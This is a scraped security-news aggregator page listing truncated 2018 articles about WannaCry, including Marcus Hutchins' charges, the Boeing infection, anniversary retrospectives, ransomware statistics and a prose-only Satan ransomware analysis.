What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2018-06-11 16:02:01 | (Déjà vu) A week in security (June 4 – June 10) (lien direct) |
A roundup of the security news from June 4 – June 10, including IoT botnets, government attacks, dodgy Wi-Fi, and more.
Categories:
Security world
Week in security
Tags: APTbotnetIoTmalwareMobileransomwareWannaCry
(Read more...)
|
Wannacry | ||
 |
2018-06-07 17:20:00 | FBI Slaps New Charges Against Researcher Who Stopped WannaCry (lien direct) | Federal authorities charged Marcus Hutchins with lying to the government and authoring a second piece of malware in addition to the Kronos banking Trojan. | Wannacry | ||
 |
2018-06-07 05:38:01 | Marcus Hutchins, WannaCry-killer, hit with four new charges by the FBI (lien direct) | Marcus Hutchins, the British malware analyst who helped stop global Wannacry menace, is now facing four new charges related to malware he allegedly created and promoted it online to steal financial information.
Hutchins, the 24-year-old better known as MalwareTech, was arrested by the FBI last year as he was headed home to England from the DefCon conference in Las Vegas for his alleged role
|
Wannacry | ||
 |
2018-06-06 20:00:00 | US Piles New Charges on Marcus Hutchins (aka MalwareTech) (lien direct) | The US government has filed new charges against Marcus Hutchins, the security researcher known as MalwareTech who stopped the WannaCry ransomware outbreak last year. [...] | Wannacry | ||
 |
2018-06-05 13:00:02 | Healthcare, Retail, and Finance: Gen V Attacks Affect All Industries (lien direct) | Fifth generation mega-attacks have changed the cyber security landscape forever. As proven by the WannaCry and Petya ransomware attacks last year, using vulnerabilities and exploit tools stolen from intelligence agencies, attackers can now cause economic chaos across all industries around the world. From finance to healthcare to manufacturing, almost all organizations across all industries […] | Wannacry | ||
 |
2018-06-01 15:00:00 | Satan Ransomware Spawns New Methods to Spread (lien direct) |
Today, we are sharing an example of how previously known malware keeps evolving and adding new techniques to infect more systems.
BleepingComputer first reported on Satan ransomware in January 2017. Recently, Satan Ransomware was identified as using the EternalBlue exploit to spread across compromised environments (BartBlaze’s blog). This is the same exploit associated with a previous WannaCry Ransomware campaign. While Microsoft patched the vulnerability associated with EternalBlue in March 2017, many environments remain vulnerable.
Unusually, we’ve identified samples of Satan Ransomware that not only include EternalBlue,but also a far larger set of propagation methods:
This Satan variant attempts to propagate through:
JBoss CVE-2017-12149
Weblogic CVE-2017-10271
EternalBlue exploit CVE-2017-0143
Tomcat web application brute forcing
Malware Analysis
Below is a sample from early May 2018 of Satan Ransomware using all the previously mentioned techniques, which we are going to analyze.
Name: sts.exe
File size: 1.7 Mb
MD5: c290cd24892905fbcf3cb39929de19a5
The first thing we see in the analyzed sample is that the malware was packed with the MPRESS packer:
The main goal of this sample is to drop Satan Ransomware,encrypt the victim's host, and then request a Bitcoin payment. Afterwards, the sample will also try to spread in the network using exploits such as EternalBlue.
EternalBlue
The malware drops several EternalBlue files in the victim’s host. These files are a public version of the exploit without any modifications or custom implementations. All are dropped in the folder C:\Users\All Users\ in the infected system:
Sts.exe initiates the process of spreading across the network by scanning all the systems within the same network segment. Through the following command line, systems vulnerable to SMB EternalBlue exploit will execute the previously dropped library down64.dll.
The down64.dll attempts to load code in the target’s memory, and then downloads sts.exe, using the legitimate Microsoft certutil.exe tool. This is a known download technique described as Remote File Copy - T1105 in Mitre ATT&CK.
So Many Exploits....
The sample uses some other network activity to continue to spread across the network.
A compromised system will make a HTTP PUT request to /Clist1.jsp to execute a jsp file that downloads another sample of sts.exe in the target server.
Another interesting technique used to infect other systems is the ability to identify an Apache Tomcat server and bruteforce it. It make |
Ransomware | Wannacry | |
 |
2018-05-30 08:59:04 | Q&A: How EventTracker breathes new life into SIEMs - by co-managing company systems (lien direct) | Security information and event management systems – aka SIEMs — arrived in the corporate environment some 13 years ago holding much promise. Related article: WannaCry revives self-spreading viruses SIEMs hoovered up anything that might be a security issue in real-time from various event and data sources. Companies could pump in all of the data traffic […] | Wannacry | ||
 |
2018-05-21 13:00:02 | I Still WannaCry One Year Later (lien direct) | The ISBuzz Post: This Post I Still WannaCry One Year Later | Wannacry | ||
|
2018-05-17 19:00:00 | Get Ready for \'WannaCry 2.0\' (lien direct) | Another widespread worm attack is "inevitable," but spreading a different more lucrative or destructive payload, experts say. | Wannacry | ||
 |
2018-05-17 15:25:05 | One Year After WannaCry: A Fundamentally Changed Threat Landscape (lien direct) | Threatpost talked to several security researchers about what's changed in the past year. | Wannacry | ||
|
2018-05-15 13:00:04 | One Year Later: WannaCry, The Dawn Of A New Generation Of Cyber-Attacks (lien direct) | A year ago today, after multiple days of digital bombardment, the cyber-security world changed forever. Over one weekend, the notorious ransomware attack that would become widely known as WannaCry infected more than 200,000 machines around the world, causing billions of dollars in damages. Ransomware attacks occur all the time, but the speed and the […] | Wannacry | ||
 |
2018-05-14 11:57:04 | WannaCryptor: The curious tale of a ravenous cryptoworm (lien direct) | >Do you still remember how WannaCryptor ran its – winding – course? It was a tale that revealed a number of intriguing plot lines amid the ransomworm's numerous twists and turns. | Wannacry | ||
 |
2018-05-12 13:28:04 | Wannacry outbreak anniversary: the EternalBlue exploit even more popular now (lien direct) | WannaCry ransomware outbreak anniversary – According to researchers from ESET, the popularity of EternalBlue increase significantly over the past months. Exactly one year ago, on May 12, the WannaCry ransomware infected hundreds of thousands of computers worldwide. The success of the malware was the use of the EternalBlue exploit that was stolen by Shadow Brokers […] | Wannacry | ||
|
2018-05-12 10:30:00 | NHS WannaCry: One Year On (lien direct) | The ISBuzz Post: This Post NHS WannaCry: One Year On | Wannacry | ||
 |
2018-05-11 17:41:04 | One Year After WannaCry Outbreak, EternalBlue Exploit Still a Threat (lien direct) | One year after the WannaCry ransomware outbreak, the NSA-linked exploit used for propagation is still threatening unpatched and unprotected systems, security researchers say. | Wannacry | ||
|
2018-05-11 14:05:01 | One Year After WannaCry, EternalBlue Exploit Is Bigger Than Ever (lien direct) | Tomorrow, May 12, is the one-year anniversary of the WannaCry ransomware outbreak. Exactly one year after the biggest cyber-security incident in history, the exploit at the heart of the WannaCry attack is now more popular than ever, according to telemetry data gathered by Slovak antivirus vendor ESET. [...] | Wannacry | ||
|
2018-05-11 09:59:03 | 12 months on, what are the lessons learned from WannaCryptor? (lien direct) | >Time does fly! It feels like only yesterday that a new strain of hitherto little-known malware achieved celebrity status among global ransomware campaigns | Wannacry | ||
|
2018-05-10 23:30:03 | One Year After WannaCry: What\'s Changed & What Hasn\'t? (May 12 Marks One Year) (lien direct) | The ISBuzz Post: This Post One Year After WannaCry: What’s Changed & What Hasn’t? (May 12 Marks One Year) | Wannacry | ||
|
2018-05-10 12:57:03 | One year later: EternalBlue exploit more popular now than during WannaCryptor outbreak (lien direct) | >The infamous outbreak may no longer be causing mayhem worldwide but the threat that enabled it is still very much alive and posing a major threat to unpatched and unprotected systems | Wannacry | ||
 |
2018-05-10 10:09:02 | Half of UK Organisations Have Fallen Prey to Ransomware Attacks (lien direct) | A year after the WannaCry ransomware attack impacted an estimated 200,000 victims and 200,000 computers, new research from Webroot, the Smarter Cybersecurity® company has revealed that organisations across the UK are still struggling to deal with ransomware. Webroot surveyed over 400 IT decision makers at UK businesses and found that 45 per cent of those ... | Wannacry | ||
|
2018-05-08 23:16:05 | \'More Exposed Than Ever\' – Businesses Not Ready For Another WannaCry (lien direct) | The ISBuzz Post: This Post 'More Exposed Than Ever' – Businesses Not Ready For Another WannaCry | Wannacry | ||
 |
2018-05-04 17:13:01 | WannaCry Dominates Ransomware News in 2017, Drives 415 Percent Attack Boost (lien direct) | >WannaCry drove a 415 percent increase in ransomware attacks and accounted for 90 percent of all detection reports in 2017. In addition to these eye-popping numbers, F-Secure’s “The Changing State of Ransomware” report also offered some positive ransomware news: The lack of big paydays for campaigns such as WannaCry and NotPetya are now causing a […] | NotPetya Wannacry | ||
|
2018-05-03 16:36:04 | Commodity Ransomware Declines as Corporate Attacks Increase (lien direct) | 2017 was a landmark year for ransomware, with WannaCry and NotPetya grabbing headlines around the world. Ransomware attacks grew by more than 400% over the year, while the number unique families and variants increased by 62%. These statistics, however, disguise an apparent change in the ransomware industry following the summer of 2017. | NotPetya Wannacry | ||
|
2018-04-30 13:30:05 | (Déjà vu) NHS Switches To Windows 10 In The Wake Of WannaCry (lien direct) | The ISBuzz Post: This Post NHS Switches To Windows 10 In The Wake Of WannaCry | Wannacry | ||
|
2018-04-30 00:20:00 | UK Health Agency Switches to Windows 10 Citing WannaCry Ransomware Outbreak (lien direct) | The UK Department of Health and Social Care has announced that it will transition all National Health Service (NHS) computer systems to Windows 10. [...] | Wannacry | ||
|
2018-04-23 14:30:03 | The Next WannaCry Is Coming … Are You Ready? (lien direct) | The ISBuzz Post: This Post The Next WannaCry Is Coming … Are You Ready? | Wannacry | ||
 |
2018-04-22 19:25:25 | OMG The Stupid It Burns (lien direct) | This article, pointed out by @TheGrugq, is stupid enough that it's worth rebutting.“The views and opinions expressed are those of the author and not necessarily the positions of the U.S. Army, Department of Defense, or the U.S. Government.” | Wannacry | ||
|
2018-04-18 19:30:04 | NHS Criticised For Not Improving Security A Year On From WannaCry (lien direct) | The ISBuzz Post: This Post NHS Criticised For Not Improving Security A Year On From WannaCry | Wannacry | ||
 |
2018-04-17 22:53:02 | NHS ransomware attack response criticised (lien direct) | MPs say it is "alarming" plans to improve cyber-security after the Wannacry attack have not been agreed. | Wannacry | ||
|
2018-04-13 16:10:02 | Illumio, Qualys Partner on Vulnerability-based Micro-Segmentation (lien direct) | Vulnerability management has two major components: discovering vulnerabilities, and mitigating those vulnerabilities. The first component is pointless without the second component. So, for example, Equifax, WannaCry, NotPetya, and many other breaches -- if not most breaches -- are down to a failure to patch, which is really a failure in vulnerability management. | NotPetya Wannacry Equifax | ||
|
2018-04-10 08:00:00 | WannaCry Ransomware Sinkhole Data Now Available to Organizations (lien direct) | Kryptos Logic, the cyber-security firm running the main WannaCry sinkhole, announced today plans to allow organizations access to some of the WannaCry sinkhole data. [...] | Wannacry | ||
|
2018-04-06 04:41:01 | Microsoft Office 365 Gets Built-in Ransomware Protection and Enhanced Security Features (lien direct) | Ransomware has been around for a few years, but it has become an albatross around everyone's neck, targeting big businesses, hospitals, financial institutions and individuals worldwide and extorting millions of dollars.
Last year, we saw some major ransomware outbreaks, including WannaCry and NotPetya, which wreaked havoc across the world, hitting hundreds of thousands of computers and
|
NotPetya Wannacry | ||
|
2018-04-05 13:17:00 | Pyongyang Hackers Could be Major Future Threat: Parliament (lien direct) | The North Korean cyber-threat to the UK remains below that of Russia and China but could increase in the future, a new parliamentary Defence Committee report has claimed. It reiterated the view that the WannaCry ransomware attack which decimated large parts of the NHS was carried out by the Kim Jong-un regime, but that the ... | Wannacry | ||
|
2018-04-03 12:30:03 | WannaCry Ransomware (lien direct) | The ISBuzz Post: This Post WannaCry Ransomware | Wannacry | ||
|
2018-04-02 21:56:03 | Podcast Episode 90: WannaCry zombie haunts Boeing, UL tests for cyber security and Harvard war games election hacking (lien direct) | In this week's podcast, Episode #90: has the WannaCry ransomware returned from the dead? We talk with an expert from Juniper Networks about what might be behind the outbreak at Boeing. Also: Underwriters Lab and Johnson Controls join us on the podcast to talk about a recent milestone: UL’s award of the first ever Level 3 certificate for...Read the whole entry... _!fbztxtlnk!_ https://feeds.feedblitz.com/~/536674118/0/thesecurityledger -->»
|
Wannacry | ||
|
2018-03-30 14:50:00 | The Week in Ransomware - March 30th 2018 - Mostly Small Variants (lien direct) | It was mostly small variants released this week. We did have a new Cryptomix variant released, a wiper called UselessDisk disguised as a ransomware, and a strange report that Boeing had been infected with WannaCry. Overall, though, it has been a slow week. [...] | Wannacry | ||
|
2018-03-29 22:25:24 | WannaCry after one year (lien direct) | In the news, Boeing (an aircraft maker) has been "targeted by a WannaCry virus attack". Phrased this way, it's implausible. There are no new attacks targeting people with WannaCry. There is either no WannaCry, or it's simply a continuation of the attack from a year ago.It's possible what happened is that an anti-virus product called a new virus "WannaCry". Virus families are often related, and sometimes a distant relative gets called the same thing. I know this watching the way various anti-virus products label my own software, which isn't a virus, but which virus writers often include with their own stuff. The Lazarus group, which is believed to be responsible for WannaCry, have whole virus families like this. Thus, just because an AV product claims you are infected with WannaCry doesn't mean it's the same thing that everyone else is calling WannaCry.Famously, WannaCry was the first virus/ransomware/worm that used the NSA ETERNALBLUE exploit. Other viruses have since added the exploit, and of course, hackers use it when attacking systems. It may be that a network intrusion detection system detected ETERNALBLUE, which people then assumed was due to WannaCry. It may actually have been an nPetya infection instead (nPetya was the second major virus/worm/ransomware to use the exploit).Or it could be the real WannaCry, but it's probably not a new "attack" that "targets" Boeing. Instead, it's likely a continuation from WannaCry's first appearance. WannaCry is a worm, which means it spreads automatically after it was launched, for years, without anybody in control. Infected machines still exist, unnoticed by their owners, attacking random machines on the Internet. If you plug in an unpatched computer onto the raw Internet, without the benefit of a firewall, it'll get infected within an hour.However, the Boeing manufacturing systems that were infected were not on the Internet, so what happened? The narrative from the news stories imply some nefarious hacker activity that "targeted" Boeing, but that's unlikely.We have now have over 15 years of experience with network worms getting into strange places disconnected and even "air gapped" from the Internet. The most common reason is laptops. Somebody takes their laptop to some place like an airport WiFi network, and gets infected. They put their laptop to sleep, then wake it again when they reach their destination, and plug it into the manufacturing network. At this point, the virus spreads and infects everything. This is especially the case with maintenance/support engineers, who often have specialized software they use to control manufacturing machines, for which they have a reason to connect to the local network even if it doesn't have useful access to the Internet. A single engineer may act as a sort of Typhoid Mary, going from customer to customer, infecting each in turn whenever they open their laptop.Another cause for infection is virtual machines. A common practice is to take "snapshots" of live machines and save them to backups. Should the virtual machine crash, instead of rebooting it, it's simply restored from the backed up running image. If that backup image is infected, then bringing it out of sleep will allow the worm to start spreading.Jake Williams claims he's seen three other manufacturing networks infected with WannaCry. Why does manufacturing seem more susceptible? The reason appears to be the "killswitch" that stops WannaCry from running elsewhere. The killswitch uses a DNS lookup, stopping itself if it can resolve a certain domain. Manufacturing networks are largely disconnected from the Internet enough that such DNS lookups don't work, so the domain can't be found, so the killswitch doesn't work. Thus, manufacturing systems are no more likely to get infected, but the lack of killswitch means the virus will conti | Medical | Wannacry APT 38 | |
 |
2018-03-29 20:53:04 | Boeing infecté par WannaCry et une fausse banque cachée dans un site Airbus (lien direct) | Wannacry s’invite dans des machines de chez Boeing pendant qu’une fausse banque est cachée par un pirate dans la boutique officielle d’Airbus. Il semble y avoir une impression persistante, au sein des entreprises, que la souche du ransomware WannaCry n'est plus active. Mais ce n'es... Cet article Boeing infecté par WannaCry et une fausse banque cachée dans un site Airbus est apparu en premier sur ZATAZ. | Wannacry | ||
|
2018-03-29 14:34:05 | WannaCryptor said to reappear, hitting Boeing\'s computers (lien direct) | The notorious ransomware prompted fears that aircraft production could be impacted | Wannacry | ||
|
2018-03-29 11:45:03 | Boeing suffering from WannaCry outbreak (lien direct) | In a baffling turn of events, computers at Boeing have allegedly been infected with the WannaCry Ransomware. View Full Story ORIGINAL SOURCE: Bleeping Computer | Wannacry | ||
|
2018-03-29 11:30:00 | WannaCry Re-emerges at Boeing (lien direct) | Computers at the aerospace giant were hit by the WannaCry malware but systems are back to normal | Wannacry | ||
|
2018-03-29 09:12:00 | Boeing production plant infected with WannaCry ransomware (lien direct) | According to a report from the Seattle Times, the dreaded WannaCry ransomware hit a Boeing production plant in Charleston, South Carolina on Wednesday. WannaCry is back, this time it infected some systems belonging to US aircraft manufacturer Boeing. According to a report from the Seattle Times, the dreaded ransomware hit a Boeing production plant in Charleston, South Carolina on […] | Wannacry | ||
|
2018-03-28 19:21:03 | Boeing Is Dealing With a Suspected WannaCry Ransomware Outbreak (lien direct) | In a baffling turn of events, computers at Boeing have allegedly been infected with the WannaCry Ransomware. According to the Seattle Times, a memo was sent out by a Boeing employee that states that systems have been affected and that their were concerns the ransomware would "spread to airplane software". [...] | Wannacry | ||
|
2018-03-27 17:04:04 | Statistics Say Don\'t Pay the Ransom; but Cleanup and Recovery Remains Costly (lien direct) | Businesses have lost faith in the ability of traditional anti-virus products to detect and prevent ransomware. Fifty-three percent of U.S companies infected by ransomware in 2017 blamed legacy AV for failing to detect the ransomware. Ninety six percent of those are now confident that they can prevent future attacks, and 68% say this is because they have replaced legacy AV with next-gen endpoint protection. Thes details come from a February 2018 survey undertaken by Vanson Bourne for SentinelOne, a next-gen provider, allowing SentinelOne to claim, "This distrust in legacy AV further confirms the required shift to next-gen endpoint protection in defending against today's most prominent information security threats." This is a fair statement, but care should be taken to not automatically confuse 'legacy AV' with all traditional suppliers -- many can also now be called next-gen providers with their own flavors of AI-assisted malware detection. SentinelOne's Global Ransomware Report 2018 (PDF) questioned 500 security and risk professionals (200 in the U.S., and 100 in each of France, Germany and the UK) employed in a range of verticals and different company sizes. The result provides evidence that paying a ransom is not necessarily a solution to ransomware. Forty-five percent of U.S. companies infected with ransomware paid at least one ransom, but only 26% had their files unlocked. Furthermore, 73% of those firms that paid the ransom were targeted at least once again. Noticeably, while defending against ransomware is a security function, responding to it is a business function: 44% of companies that paid up did so without the involvement or sanction of the IT/security teams. The attackers appear to have concluded that U.S. firms are the more likely to pay a ransom, and more likely to pay a higher ransom. While the global average ransom is $49,060, the average paid by U.S. companies was $57,088. "If the cost of paying the ransomware is less than the lost productivity caused by downtime from the attack, they tend to pay," SentinelOne's director of product management, Migo Kedem, told SecurityWeek. "This is not good news, as it means the economics behind ransomware campaigns still make sense, so attacks will continue." This is in stark contrast to the UK, where the average payment is almost $20,000 lower at $38,500. It is tempting to wonder if this is because UK companies just don't pay ransoms. In 2016, 17% of infected UK firms paid up; now it is just 3%. This may reflect the slightly different approaches in law enforcement advice. While LEAs always say it is best not to pay, the UK's NCSC says flatly, 'do not pay', while the FBI admits that it is ultimately the decision of each company. Paying or not paying, is, however, only a small part of the cost equation; and the UK's Office for National Statistics (ONS) provides useful figures. According the SentinelOne, these figures show that in a 12-month period, the average cost of a ransomware infection to a UK business was £329,976 ($466,727). With 40% of businesses with more than 1000 employees being infected, and 2,625 such organizations in the UK, the total cost of ransomware to UK business in 12 months was £346.4 m | Guideline | Wannacry | |
|
2018-03-27 13:00:00 | Tales from the SOC: The Simulated Attack (lien direct) |
Introduction
In today’s world, understanding threats and how to avoid them are critical to a business’s success. Last year, we saw an evolution in malware and attacks. Ransomwares like WannaCry made their debut; featuring worm-like attributes that allowed ransomware to self-propagate through a network, exploiting vulnerable machines and continuing the damage. We started to see attackers using more advanced automation in their malware and shiftier distribution methods to thwart defenses. In September 2017, we saw a supply chain attack against download servers that added a Trojan virus within versions of the popular CCleaner PC utility software. The download was undetected for almost a month and it is estimated that over 2 million users had installed it.
According to the US government, cyberattacks reportedly cost the US economy a $57-109 billion-dollar loss in 2016. Cisco reported in 2017 that 53% of cyberattacks resulted in damages of over $500k or more; 8% had damage totals over $5 million per incident. While costs are skyrocketing, so is the average timeframe for detecting cyberattacks. Multiple studies over the last several years have found businesses are averaging a three to eight-month time period before even detecting a cyber-attack.
We know the threat is real and the costs of a cyberattack can be exorbitant, so what can we do with all this information? As an MSSP, something we always recommend to our clients and prospects is practicing a multi-layer defense approach within their network. Multiple layers of security are an important part of detecting, preventing, and minimizing a business’s exposure to a cyberattack. So many times, we have heard “I have good anti-virus and an expensive firewall; I don’t need any other defenses.” Unfortunately, that is no longer the case. Preventive security is no longer enough; organizations must build a strong defense and use offensive practices to proactively head off potential intrusions.
In today’s blog, we share with you a real-life experience and what we did to mitigate the threat by building a strong cybersecurity strategy.
Tale from Our SOC
Several years ago, we helped a client implement managed security services. The client’s priorities were never focused on security, until they had hired a consulting company to perform a simulated cyberattack. The exercise shed light on their security shortcomings. It highlighted how the current controls they had in place failed during the simulated attack and what methods were missing from their environment, including: incident response, security awareness and systems capable of detecting these acts.
The Simulated Attack
When the simulated attack was started, they only used the organization’s name. The first step was reconnaissance about this organization, where common tools like Google and LinkedIn were used to search for user email formats, website, and domain information. As the discovery phase progressed, IPs for VPN server access and email servers were identified. Based off the information they discovered, user lists were built, and a phishing campaign was prepared. The attacker ran vulnerability scans and methodical brute force tests to identify any weaknesses within the external services they had already identified.
 The next step in the simulated attack was the phishing campaign. Now that the attacker had built a list of potential emails, they |
Guideline | CCleaner Wannacry | |
|
2018-03-26 13:19:01 | (Déjà vu) Energy Sector Most Impacted by ICS Flaws, Attacks: Study (lien direct) | The energy sector was targeted by cyberattacks more than any other industry, and many of the vulnerabilities disclosed last year impacted products used in this sector, according to a report published on Monday by Kaspersky Lab. The security firm has analyzed a total of 322 flaws disclosed in 2017 by ICS-CERT, vendors and its own researchers, including issues related to industrial control systems (ICS) and general-purpose software and protocols used by industrial organizations. Of the total number of security holes, 178 impact control systems used in the energy sector. Critical manufacturing organizations – this includes manufacturers of primary metals, machinery, electrical equipment, and transportation equipment – were affected by 164 of these vulnerabilities. Other industries hit by a significant number of vulnerabilities are water and wastewater (97), transportation (74), commercial facilities (65), and food and agriculture (61). Many of the vulnerabilities disclosed last year impacted SCADA or HMI components (88), industrial networking devices (66), PLCs (52), and engineering software (52). However, vulnerabilities in general purpose software and protocols have also had an impact on industrial organizations, including the WPA flaws known as KRACK and bugs affecting Intel technology. Learn More at SecurityWeek's ICS Cyber Security Conference As for the types of vulnerabilities, nearly a quarter are web-related and 21 percent are authentication issues. A majority of the flaws have been assigned severity ratings of medium or high, but 60 weaknesses are considered critical based on their CVSS score. Kaspersky pointed out that all vulnerabilities with a CVSS score of 10 are related to authentication and they are all easy to exploit remotely. Kaspersky said 265 of the vulnerabilities can be exploited remotely without authentication and without any special knowledge or skills. It also noted that exploits are publicly available for 17 of the security holes. The company has also shared data on malware infections and other security incidents. In the second half of 2017, Kaspersky security products installed on industrial automation systems detected nearly 18,000 malware variants from roughly 2,400 families. Malware attacks were blocked on almost 38 percent of ICS computers protected by the company, which was slightly less than in the second half of the previous year. Again, the energy sector was the most impacted. According to the security firm, roughly 40 percent of the devices housed by energy organizations were targeted. | Guideline | Wannacry | ★★★★★ |
|
2018-03-23 19:45:03 | (Déjà vu) Ransomware Hits City of Atlanta (lien direct) | A ransomware attack -- possibly a variant of SamSam -- has affected some customer-facing applications and some internal services at the City of Atlanta. The FBI and incident response teams from Microsoft and Cisco are investigating. The city's police department, water services and airport are not affected. The attack was detected early on Thursday morning. By mid-day the city had posted an outage alert to Twitter. In a press conference held Thursday afternoon, mayor Keisha Bottoms announced that the breach had been ransomware. She gave no details of the ransomware demands, but noticeably declined to say whether the ransom would be payed or refused. Bottoms could not at this stage confirm whether personal details had also been stolen in the same breach, but suggested that customers and staff should monitor their credit accounts. Questions on the viability of data backups and the state of system patches were not clearly answered; but it was stressed that the city had adopted a 'cloud first' policy going forwards specifically to improve security and mitigate against future ransomware attacks. A city employee obtained and sent a screenshot of the ransom note to local radio station 11Alive. The screenshot shows a bitcoin demand for $6,800 per system, or $51,000 to unlock all systems. It is suggested that the ransom note is similar to ones used by the SamSam strain of ransomware. Steve Ragan subsequently tweeted, "1 local, 2 remote sources are telling me City of Atlanta was hit by SamSam. The wallet where the ransom is to be sent (if they pay) has collected $590,000 since Jan 27." SamSam ransomware infected two healthcare organizations earlier this year. SamSam is not normally introduced via a phishing attack, but rather following a pre-existing breach. This could explain the concern over data theft on top of the data encryption. It also raises the question over whether the initial breach was due to a security failure, an unpatched system, or via a third-party supplier. Ransomware is not a new threat, and there are mitigations -- but it continues to cause havoc. Official advice is, wherever at all possible, refuse to pay. The theory is if the attackers cease getting a return on their attacks, they will turn to something easier with a better ROI on their time. This approach simply isn't working. Sometimes payment can be avoided by recovering data from backups | NotPetya Wannacry | ||
|
2018-03-19 12:24:04 | Preventing Business Email Compromise Requires a Human Touch (lien direct) | Human-powered Intelligence Plays a Critical Role in Defending Against Socially Engineered Attacks The FBI's Internet Crime Complaint Center (IC3) declared Business Email Compromise (BEC) the “3.1 billion dollar scam” in 2016, an amount which then grew in the span of one year into a “5 billion dollar scam.” Trend Micro now projects those losses in excess of 9 billion dollars. It's an understatement to say BEC scams and the resulting damages are on the rise. But with cybersecurity spending across all sectors at an all-time high, how is such an unsophisticated threat still costing otherwise well-secured organizations billions of dollars? Unlike the numerous types of attacks that incorporate malware, most BEC scams rely solely on social engineering. In fact, its use of trickery, deception, and psychological manipulation rather than malware is largely why BEC continually inflicts such substantial damages. Since most network defense solutions are designed to detect emails containing malware and malicious links, BEC emails often land directly in users' inboxes. And when this happens, the fate of an attempted BEC scam is in the hands of its recipient. Indeed, BEC underscores why even the most technically sophisticated cyber defenses aren't always a match for low-tech threats. Combating BEC requires more than just advanced technologies and robust perimeter security-it requires humans to understand the threat. Here's why: Human-Powered Intelligence Trumps Automation Since socially engineered attacks such as BEC are designed to exploit human instincts and emotions, human-powered intelligence naturally plays a critical role in defending against these attacks. I've written previously about the limitations of so-called automated intelligence and why human expertise and analysis are irreplaceable. BEC epitomizes this notion. After all, intelligence offerings that rely solely on automation tend to comprise little more than technical indicators of compromise (IoCs). BEC campaigns can have IoCs-but they tend to be less technical and more nuanced, often pertaining to an attacker's syntax, dialect, or other behavioral characteristics. While an IoC for a phishing campaign, for example, might be an email address, an IoC for a BEC campaign could be the phrase an attacker uses to open or sign off the email. Automated intelligence offerings and traditional network security solutions are generally not desig | Guideline | Wannacry | |
|
2018-03-15 13:03:01 | (Déjà vu) Microsoft Publishes Bi-annual Security Intelligence Report (SIR) (lien direct) | !function(){if("undefined"==typeof powerbiresize){powerbiresize=1;var e=function(){for(var e=document.querySelectorAll("[pbi-resize=powerbi]"),i=0;i | NotPetya Wannacry | ||
|
2018-03-12 13:00:00 | Countering Crypto-Malware: A Guide to Preventing a Ransomware Infection (lien direct) |
Ransomware had what Malwarebytes describes as a "banner year" in 2017. In the 2017 State of Malware report, telemetry gathered by the anti-malware provider reveals that business and consumer ransomware detections swelled by 90 percent and 93 percent, respectively. The monthly rate of ransomware attacks against businesses grew by approximately 10 times the rate of 2016 over the same period in 2017. A 700 percent increase in ransomware helped drive that surge, with GlobeImposter and WannaCry leading the way.
Malwarebytes 2017 State of Malware report page 6
Overall, Malwarebytes saw new ransomware development stagnate in the second half of 2017 as digital criminals shifted their focus to bring back old threats like banking Trojans and embrace new techniques, most notably malicious cryptocurrency miners. Those trends notwithstanding, ransomware isn't going away anytime soon. Users should therefore follow these five simple steps that can help them stay safe from a ransomware attack.
Install an Anti-Malware Solution
While some digital attackers are turning to fileless malware, many ransomware strains still come with a digital signature. Anti-malware solutions can use these imprints to detect and block a crypto-malware threat before it has time to execute on a computer. Victims of ransomware can also use these tools to clean their computers of ransomware before they restore their data using a free decryption tool or available backup.
Update Your Systems Regularly
A common delivery vector for ransomware is an exploit kit. It's a type of software package that scans for known vulnerabilities in Adobe Flash Player and other programs. If it finds a match with its hardcoded exploits, the kit launches code that exploits the vulnerability and in turn downloads ransomware onto the vulnerable machine. By staying current with software patches, however, users can block exploit kits from activating on their computers.
How Exploit Kits Work. (Source: Barkly)
Avoid Suspicious Links and Email Attachments
As seen in the graphic above, one of the most common beginnings of an exploit kit campaign involves a phishing email recipient clicking on a malicious link that redirects them to a compromised website. Users aren't powerless against these tactics. They can make a point of not clicking suspicious links and email attachments, including those that come with messages sent to them from unfamiliar senders.
Disable Macros for Office Documents
Microsoft Office documents come with what's called macros. They are essentially rules that users can craft in order to save time by automating repetitive tasks. Unfortunately, digital attackers often hide ransomware executables within Office macros and attempt to capitalize on users' curiosity by tempting them with an unknown attachment. Users can protect themselves against this trick by disabling macros in Office, by steering clear of unsolicited attachments, and by making it a rule to not enable macros in any document should they receive a prompt to do so.
Install a Pop-Up Blocker
Bad actors don't just rely on ema |
Guideline | Wannacry |
To see everything:
Our RSS (filtrered)
